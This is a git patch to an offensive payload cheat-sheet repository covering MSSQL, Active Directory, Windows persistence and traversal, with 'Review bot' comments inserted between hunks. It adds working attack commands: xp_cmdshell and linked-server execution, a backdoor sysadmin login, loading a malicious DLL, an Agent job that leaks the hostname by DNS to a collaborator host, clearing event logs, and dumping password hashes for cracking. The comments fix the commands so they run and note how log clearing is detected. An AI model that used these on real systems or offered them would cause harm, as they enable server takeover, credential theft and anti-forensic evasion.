From 4abd52697f2fb9be94e0d785c77e4af5119efcd0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 10 Mar 2022 11:05:17 +0100 Subject: [PATCH] MSSQL Agent Command Execution --- Directory Traversal/README.md | 10 ++ .../Active Directory Attack.md | 7 +- .../MSSQL Server - Cheatsheet.md | 99 +++++++++++++++++-- .../Windows - Persistence.md | 8 ++ SQL Injection/MSSQL Injection.md | 2 +- 5 files changed, 113 insertions(+), 13 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index e459021..665af6c 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -99,6 +99,16 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` +### Java Bypass + +Bypass Java's URL protocol + +```powershell +url:file:///etc/passwd +url:http://127.0.0.1:8080 +``` + + ## Path Traversal ### Interesting Linux files diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ef83864..5df6bc9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1264,9 +1264,9 @@ lsadump::lsa /inject /name:krbtgt Useful when you want to have the clear text password or when you need to make stats about weak passwords. Recommended wordlists: -- rockyou (available in Kali Linux) -- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- Weakpass.com +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) - Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) ```powershell 
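Review bot: "Bypass Java's URL protocol" in the new Directory Traversal section does not say which check the two strings defeat, and the fence is tagged `powershell` for what is plain text. If this refers to `java.net.URL` silently dropping a leading `url:` prefix before parsing, the sentence to add is that a scheme allow/deny check done on the raw string (for example rejecting anything that starts with `file:`) is bypassed because `new URL("url:file:///etc/passwd")` still resolves to the `file` scheme, and the same applies to the `url:http://127.0.0.1:8080` line, which is really an SSRF filter bypass rather than a path-traversal one. The fence should be tagged `text` or left untagged so readers do not try to run it as PowerShell.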
@@ -1282,7 +1282,6 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H. ``` :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- ~~[hashes.org](https://hashes.org/check.php)~~ - [hashmob.net](https://hashmob.net) - [crackstation.net](https://crackstation.net) - [hashes.com](https://hashes.com/en/decrypt/hash) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 7c693f0..cfd9e9c 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -14,6 +14,8 @@ * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) * [Dump common information from server to files](#dump-common-information-from-server-to-files) * [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) * [Query Version of Linked Database](#query-version-of-linked-database) 
@@ -22,7 +24,7 @@ * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - * [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) * [Extended Stored Procedure](#extended-stored-procedure) * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) @@ -130,6 +132,31 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv ## Linked Database +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ### Crawl Links for Instances in the Domain A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results 
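Review bot: Under "Find Trusted Link", `select * from master..sysservers` lists every linked server, not the ones that can be abused; what decides that is the outbound login mapping, which the view does not show, so `EXEC sp_helplinkedsrvlogin;` (or `SELECT * FROM sys.linked_logins;`) belongs next to it, and `SELECT name, provider, data_source FROM sys.servers WHERE is_linked = 1;` is the non-compatibility form. The `EXECUTE('...') AT LinkedServer` statements in the "execute shell commands" and "create user" blocks only work when the link has the `rpc out` server option set (`EXEC sp_serveroption 'LinkedServer','rpc out','true'`, which needs ALTER ANY LINKED SERVER locally), while `openquery` does not need it; a `--` comment saying so would save readers a confusing error. The `CREATE LOGIN hacker` / `sp_addsrvrolemember` pair leaves a persistent sysadmin login on SERVER1, so a matching cleanup line such as `EXECUTE('DROP LOGIN hacker') AT "DOMINIO\SERVER1"` should sit with it.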
@@ -195,28 +222,63 @@ Get-SQLQuery -Instance "" -Query "select * from openque ``` -### Command Execution via xp_cmdshell +## Command Execution via xp_cmdshell > xp_cmdshell disabled by default since SQL Server 2005 ```ps1 -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami -Creates and adds local user backup to the local administrators group: -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add' -Verbose -Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose ``` +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + ## Extended Stored Procedure ### Add the extended stored procedure and list extended stored procedures ```ps1 +# Create evil DLL Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" 
Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing Get-SQLStoredProcedureXP -Instance "" -Verbose ``` +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + ## CLR Assemblies Prerequisites: @@ -322,6 +384,8 @@ GO ## OLE Automation +* :warning: Disabled by default + ### Execute commands using OLE automation procedures ```ps1 @@ -365,9 +429,21 @@ Subsystem Options: –Subsystem Jscript ``` +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + ### List All Jobs ```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose ``` 
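Review bot: The second Invoke-SQLOSCmd example still carries the stray apostrophe from the old line, now inside the quotes: `-Command "net user backup Password1234 /add'"` hands `net user backup Password1234 /add'` to cmd and the account is never created, so the line should be `-Command "net user backup Password1234 /add" -Verbose`. In the manual block, `EXEC xp_cmdshell "net user";` uses double quotes, which T-SQL treats as an identifier unless QUOTED_IDENTIFIER is OFF (sqlcmd defaults it off, SSMS/ODBC/OLE DB sessions default it on), so the single-quoted form used on the following lines is the one to keep. The reactivation block deserves a caveat above it: `sp_configure 'xp_cmdshell',1` needs ALTER SETTINGS (sysadmin/serveradmin), the option change is written to the SQL Server error log, and the shell then runs as the SQL Server service account for sysadmin callers or as the xp_cmdshell proxy account for everyone else.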
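Review bot: In the new Agent job example, `$name=$env:COMPUTERNAME[10]` takes only the 11th character of the hostname and is empty for any name shorter than 11 characters, so the lookup becomes `.redacted.burpcollaborator.net` and the collaborator hit proves execution but carries no host information; `$name=$env:COMPUTERNAME` is the less surprising form if the goal is a proof of execution. The block also needs the prerequisites a reader will hit first: the SQL Server Agent service must be running, creating a job in msdb requires sysadmin or one of the SQLAgent*Role roles, and the step runs as the Agent service account unless a proxy is assigned. While the job exists it is visible in `msdb.dbo.sysjobs` and its run in `msdb.dbo.sysjobhistory` and the Agent log, which is why the `sp_delete_job` line belongs in the example. Minor: the "List All Jobs" fence is tagged `ps1` but now opens with a T-SQL `SELECT`.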
@@ -541,7 +617,13 @@ SELECT SYSTEM_USER ### MSSQL Accounts and Hashes ```sql -SELECT name, password_hash FROM sys.sql_logins +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` @@ -557,4 +639,5 @@ Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat. * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) * [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) -* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5e3c9a2..e6a93a0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md 
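Review bot: The cracking command right after the new block, `hashcat -m 1731 ...`, only matches SQL Server 2012+ hashes (0x0200 prefix); the 2000 hashes from `sysxlogins` are mode 131 and the 2005/2008 `sql_logins` hashes (0x0100 prefix) are mode 132, so the version labels added here should carry the matching mode or the reader will crack nothing. The labels `MSSQL 2000:` / `MSSQL 2005` and the parenthetical are bare text inside a ```sql fence; as comments such as `-- MSSQL 2000 (hashcat -m 131)` and `-- MSSQL 2005+ (hashcat -m 132; 2012+ is -m 1731)` the block stays pasteable. Reading `password_hash` from `sys.sql_logins` is normally limited to logins holding CONTROL SERVER, and without it the column comes back NULL rather than erroring, which is worth one line so an empty result is not mistaken for an empty table.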
@@ -8,6 +8,7 @@ * [Antivirus Removal](#antivirus-removal) * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) + * [Clear System and Security Logs](#clear-system-and-security-logs) * [Simple User](#simple-user) * [Registry HKCU](#registry-hkcu) * [Startup](#startup) @@ -87,6 +88,13 @@ NetSh Advfirewall set allprofiles state off New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP ``` +### Clear System and Security Logs + +```powershell +cmd.exe /c wevtutil.exe cl System +cmd.exe /c wevtutil.exe cl Security +``` + ## Simple User Set a file as hidden diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 1ee72f9..920e2ac 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -96,7 +96,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` ## MSSQL Union Based
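Review bot: The new "Clear System and Security Logs" section should say that clearing is not silent: Windows writes Event ID 1102 ("The audit log was cleared") as the first entry of the emptied Security log and Event ID 104 to the System log, both of which common SIEM rules alert on, and any copy already forwarded to a collector is untouched; a comment such as `# generates EID 1102 (Security) / 104 (System); forwarded logs are not affected` covers it. It also needs an elevated prompt, and the `cmd.exe /c` wrapper is unnecessary from either cmd or PowerShell (`wevtutil.exe cl Security` works as written). Filing this under Persistence next to the Defender/firewall disables is a stretch as well; it is anti-forensics, and a reader skimming headings will look for it elsewhere.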